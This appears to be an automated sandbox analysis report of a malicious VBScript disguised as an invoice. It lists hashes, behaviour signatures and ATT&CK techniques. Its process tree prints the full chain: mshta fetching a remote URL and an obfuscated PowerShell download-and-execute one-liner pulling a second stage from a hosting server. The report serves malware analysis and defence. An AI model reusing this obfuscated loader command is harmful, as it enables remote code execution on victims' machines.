Analysis

  • max time kernel
    125s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    27-04-2021 15:14

General

  • Target

    invoice954423.vbs

  • Size

    236B

  • MD5

    755e0f945656b708f911ff7438ee3dda

  • SHA1

    147e7d2fad41deea7b15801a815dd80c340ae9b2

  • SHA256

    4622e0560aaa02a43009773a1c42f8017cae6b63f0f7950b358c22d46c757e1c

  • SHA512

    3d6c7eab9ac8ecd9fc4b8ce2f22026444500c4fc6327c674e5298a0eb3ea23ac7e9b173c67cb4fa67ce223e2dfbd0f7b338e60d5d00320ebaf6ba969d2b5d00f

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice954423.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://nyc002.hawkhost.com/~mazencom/neww/3.txt
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://nyc002.hawkhost.com/~mazencom/neww/2.txt') ;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1144

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1144-61-0x0000000000000000-mapping.dmp
  • memory/1144-63-0x0000000002360000-0x0000000002361000-memory.dmp
    Filesize

    4KB

  • memory/1144-64-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
    Filesize

    4KB

  • memory/1144-65-0x0000000002610000-0x0000000002612000-memory.dmp
    Filesize

    8KB

  • memory/1144-66-0x0000000002614000-0x0000000002616000-memory.dmp
    Filesize

    8KB

  • memory/1144-67-0x0000000002430000-0x0000000002431000-memory.dmp
    Filesize

    4KB

  • memory/1144-68-0x0000000002720000-0x0000000002721000-memory.dmp
    Filesize

    4KB

  • memory/1144-69-0x000000001B720000-0x000000001B721000-memory.dmp
    Filesize

    4KB

  • memory/1240-59-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
    Filesize

    8KB

  • memory/1416-60-0x0000000000000000-mapping.dmp